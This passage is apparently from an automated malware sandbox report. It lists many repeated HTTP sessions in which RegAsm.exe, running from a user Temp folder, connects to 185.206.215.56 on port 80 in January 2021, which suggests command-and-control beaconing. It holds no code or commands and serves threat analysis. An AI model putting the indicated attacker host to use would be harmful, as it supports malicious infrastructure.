23 | 192.168.2.22 | 49190 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:16.358508110 CET | 1172 | OUT | |
Jan 5, 2021 19:06:16.531882048 CET | 1172 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
24 | 192.168.2.22 | 49191 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:16.795878887 CET | 1173 | OUT | |
Jan 5, 2021 19:06:16.967212915 CET | 1174 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
25 | 192.168.2.22 | 49192 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.183871031 CET | 1174 | OUT | |
Jan 5, 2021 19:06:17.344388008 CET | 1175 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
26 | 192.168.2.22 | 49193 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.566776991 CET | 1176 | OUT | |
Jan 5, 2021 19:06:17.726876020 CET | 1176 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
27 | 192.168.2.22 | 49194 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:17.949146032 CET | 1177 | OUT | |
Jan 5, 2021 19:06:18.134409904 CET | 1178 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
28 | 192.168.2.22 | 49195 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:18.364453077 CET | 1178 | OUT | |
Jan 5, 2021 19:06:18.531193972 CET | 1179 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
29 | 192.168.2.22 | 49196 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:18.788238049 CET | 1180 | OUT | |
Jan 5, 2021 19:06:18.959882975 CET | 1180 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49170 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.473301888 CET | 1145 | OUT | |
Jan 5, 2021 19:06:08.645122051 CET | 1146 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
30 | 192.168.2.22 | 49197 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.176156998 CET | 1181 | OUT | |
Jan 5, 2021 19:06:19.341244936 CET | 1182 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
31 | 192.168.2.22 | 49198 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.576040030 CET | 1182 | OUT | |
Jan 5, 2021 19:06:19.751715899 CET | 1183 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
32 | 192.168.2.22 | 49199 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:19.958724022 CET | 1184 | OUT | |
Jan 5, 2021 19:06:20.125689983 CET | 1184 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
33 | 192.168.2.22 | 49200 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:20.390921116 CET | 1185 | OUT | |
Jan 5, 2021 19:06:20.569029093 CET | 1186 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
34 | 192.168.2.22 | 49201 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:20.950520992 CET | 1186 | OUT | |
Jan 5, 2021 19:06:21.111865044 CET | 1187 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
35 | 192.168.2.22 | 49202 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:21.679579973 CET | 1188 | OUT | |
Jan 5, 2021 19:06:21.837781906 CET | 1188 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
36 | 192.168.2.22 | 49203 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:22.303822041 CET | 1189 | OUT | |
Jan 5, 2021 19:06:22.484252930 CET | 1190 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
37 | 192.168.2.22 | 49204 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:22.694391966 CET | 1190 | OUT | |
Jan 5, 2021 19:06:22.877247095 CET | 1191 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
38 | 192.168.2.22 | 49205 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.094146967 CET | 1192 | OUT | |
Jan 5, 2021 19:06:23.267446041 CET | 1192 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
39 | 192.168.2.22 | 49206 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.470458031 CET | 1193 | OUT | |
Jan 5, 2021 19:06:23.640826941 CET | 1194 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49171 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:08.887025118 CET | 1147 | OUT | |
Jan 5, 2021 19:06:09.065680027 CET | 1147 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
40 | 192.168.2.22 | 49207 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:23.862730026 CET | 1194 | OUT | |
Jan 5, 2021 19:06:24.026554108 CET | 1195 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
41 | 192.168.2.22 | 49208 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:24.246260881 CET | 1196 | OUT | |
Jan 5, 2021 19:06:24.440570116 CET | 1196 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
42 | 192.168.2.22 | 49209 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:24.648293972 CET | 1197 | OUT | |
Jan 5, 2021 19:06:24.816570997 CET | 1197 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
43 | 192.168.2.22 | 49210 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.024326086 CET | 1198 | OUT | |
Jan 5, 2021 19:06:25.203072071 CET | 1199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
44 | 192.168.2.22 | 49211 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.428992033 CET | 1199 | OUT | |
Jan 5, 2021 19:06:25.591475010 CET | 1200 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
45 | 192.168.2.22 | 49212 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:25.813759089 CET | 1201 | OUT | |
Jan 5, 2021 19:06:25.992160082 CET | 1201 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
46 | 192.168.2.22 | 49213 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.197896004 CET | 1202 | OUT | |
Jan 5, 2021 19:06:26.381041050 CET | 1203 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
47 | 192.168.2.22 | 49214 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.599441051 CET | 1203 | OUT | |
Jan 5, 2021 19:06:26.766199112 CET | 1204 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
48 | 192.168.2.22 | 49215 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:26.971787930 CET | 1205 | OUT | |
Jan 5, 2021 19:06:27.131364107 CET | 1205 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
49 | 192.168.2.22 | 49216 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:27.359759092 CET | 1206 | OUT | |
Jan 5, 2021 19:06:27.547158957 CET | 1207 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49172 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:09.279376030 CET | 1148 | OUT | |
Jan 5, 2021 19:06:09.462393999 CET | 1149 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
50 | 192.168.2.22 | 49217 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:27.753619909 CET | 1207 | OUT | |
Jan 5, 2021 19:06:27.916227102 CET | 1208 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
51 | 192.168.2.22 | 49218 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.127708912 CET | 1209 | OUT | |
Jan 5, 2021 19:06:28.287151098 CET | 1209 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
52 | 192.168.2.22 | 49219 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.505440950 CET | 1210 | OUT | |
Jan 5, 2021 19:06:28.661950111 CET | 1211 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
53 | 192.168.2.22 | 49220 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:28.880701065 CET | 1211 | OUT | |
Jan 5, 2021 19:06:29.048592091 CET | 1212 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
54 | 192.168.2.22 | 49221 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:29.244494915 CET | 1213 | OUT | |
Jan 5, 2021 19:06:29.409620047 CET | 1213 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
55 | 192.168.2.22 | 49222 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:29.630363941 CET | 1214 | OUT | |
Jan 5, 2021 19:06:29.797473907 CET | 1215 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
56 | 192.168.2.22 | 49223 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.014888048 CET | 1215 | OUT | |
Jan 5, 2021 19:06:30.193197012 CET | 1216 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
57 | 192.168.2.22 | 49224 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.409914970 CET | 1217 | OUT | |
Jan 5, 2021 19:06:30.572042942 CET | 1217 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
58 | 192.168.2.22 | 49225 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:30.786520004 CET | 1218 | OUT | |
Jan 5, 2021 19:06:30.947633028 CET | 1219 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
59 | 192.168.2.22 | 49226 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.159641027 CET | 1219 | OUT | |
Jan 5, 2021 19:06:31.319802046 CET | 1220 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49173 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:09.669670105 CET | 1149 | OUT | |
Jan 5, 2021 19:06:09.843837023 CET | 1150 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
60 | 192.168.2.22 | 49227 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.542985916 CET | 1221 | OUT | |
Jan 5, 2021 19:06:31.697483063 CET | 1221 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
61 | 192.168.2.22 | 49228 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:31.903232098 CET | 1222 | OUT | |
Jan 5, 2021 19:06:32.053069115 CET | 1223 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
62 | 192.168.2.22 | 49229 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:32.262785912 CET | 1223 | OUT | |
Jan 5, 2021 19:06:32.426687956 CET | 1224 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
63 | 192.168.2.22 | 49230 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:32.647726059 CET | 1225 | OUT | |
Jan 5, 2021 19:06:32.815516949 CET | 1225 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
64 | 192.168.2.22 | 49231 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.031393051 CET | 1226 | OUT | |
Jan 5, 2021 19:06:33.190809965 CET | 1226 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
65 | 192.168.2.22 | 49232 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.398943901 CET | 1227 | OUT | |
Jan 5, 2021 19:06:33.560619116 CET | 1228 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
66 | 192.168.2.22 | 49233 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:33.770155907 CET | 1229 | OUT | |
Jan 5, 2021 19:06:33.939742088 CET | 1229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
67 | 192.168.2.22 | 49234 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.165365934 CET | 1230 | OUT | |
Jan 5, 2021 19:06:34.334827900 CET | 1230 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
68 | 192.168.2.22 | 49235 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.564013004 CET | 1231 | OUT | |
Jan 5, 2021 19:06:34.721364021 CET | 1232 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
69 | 192.168.2.22 | 49236 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:34.935154915 CET | 1232 | OUT | |
Jan 5, 2021 19:06:35.122327089 CET | 1233 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49174 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.067265987 CET | 1151 | OUT | |
Jan 5, 2021 19:06:10.236854076 CET | 1151 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
70 | 192.168.2.22 | 49237 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:35.342015982 CET | 1234 | OUT | |
Jan 5, 2021 19:06:35.512182951 CET | 1234 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
71 | 192.168.2.22 | 49238 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:35.726449013 CET | 1235 | OUT | |
Jan 5, 2021 19:06:35.894052029 CET | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
72 | 192.168.2.22 | 49239 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
73 | 192.168.2.22 | 49240 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
74 | 192.168.2.22 | 49241 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
75 | 192.168.2.22 | 49242 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
76 | 192.168.2.22 | 49243 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
77 | 192.168.2.22 | 49244 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
78 | 192.168.2.22 | 49245 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
79 | 192.168.2.22 | 49246 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49175 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.499610901 CET | 1152 | OUT | |
Jan 5, 2021 19:06:10.673142910 CET | 1153 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
80 | 192.168.2.22 | 49247 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
81 | 192.168.2.22 | 49248 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
82 | 192.168.2.22 | 49249 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
83 | 192.168.2.22 | 49250 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
84 | 192.168.2.22 | 49251 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
85 | 192.168.2.22 | 49252 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
86 | 192.168.2.22 | 49253 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
87 | 192.168.2.22 | 49254 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
88 | 192.168.2.22 | 49255 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
89 | 192.168.2.22 | 49256 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49176 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 5, 2021 19:06:10.888135910 CET | 1153 | OUT | |
Jan 5, 2021 19:06:11.065620899 CET | 1154 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
90 | 192.168.2.22 | 49257 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
91 | 192.168.2.22 | 49258 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
92 | 192.168.2.22 | 49259 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
93 | 192.168.2.22 | 49260 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
94 | 192.168.2.22 | 49261 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
95 | 192.168.2.22 | 49262 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
96 | 192.168.2.22 | 49263 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
97 | 192.168.2.22 | 49264 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
98 | 192.168.2.22 | 49265 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
99 | 192.168.2.22 | 49266 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
